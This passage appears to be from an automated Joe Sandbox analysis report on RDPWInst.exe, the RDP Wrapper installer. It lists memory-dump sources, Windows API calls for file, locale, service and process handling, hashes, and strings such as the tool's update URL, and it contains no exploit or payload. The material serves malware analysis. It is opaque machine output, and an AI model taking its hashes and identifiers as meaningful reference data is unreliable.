                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                                        • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                                                                        • API String ID: 4294395943-3115740878
                                                                                                                                                        • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                                                                        • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                                                                                                                        • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                                                                        • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                                                                                        • String ID: \
                                                                                                                                                        • API String ID: 426534248-2967466578
                                                                                                                                                        • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                                                                        • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                                                                                                                        • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                                                                        • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                                                                                                                        APIs
                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Locale$Info$Valid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1826331170-0
                                                                                                                                                        • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                                                                        • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                                                                                        • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                                                                        • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Version
                                                                                                                                                        • String ID: 8[D
                                                                                                                                                        • API String ID: 1889659487-4257705004
                                                                                                                                                        • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                                                                        • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                                                                                        • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                                                                        • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                        • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                                                                        • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                                                                                        • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                                                                        • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                                                                                        APIs
                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1705453755-0
                                                                                                                                                        • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                                                                        • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                                                                                        • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                                                                        • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                        • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                                                                        • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                                                                                        • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                                                                        • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                        • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                                                                        • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                                                                                        • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                                                                        • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                                                                                        APIs
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                        • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                                                                        • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                                                                                        • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                                                                        • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 481472006-0
                                                                                                                                                        • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                                                                        • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                                                                                        • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                                                                        • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                                                                                          • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                                                        • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                                                                        • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                                                                                                                        • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                                                                        • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                                                                                                                        APIs
                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                                                                                        • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                                                                        • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                                                                                        • API String ID: 48634454-3812534468
                                                                                                                                                        • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                                                                        • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                                                                                                                        • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                                                                        • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                                          • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                                                          • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                                                          • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                                                          • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                                                          • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                                                          • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                                                          • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                                                          • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                                                          • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                                                          • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                                                          • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                                                          • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                                                          • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                                                          • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
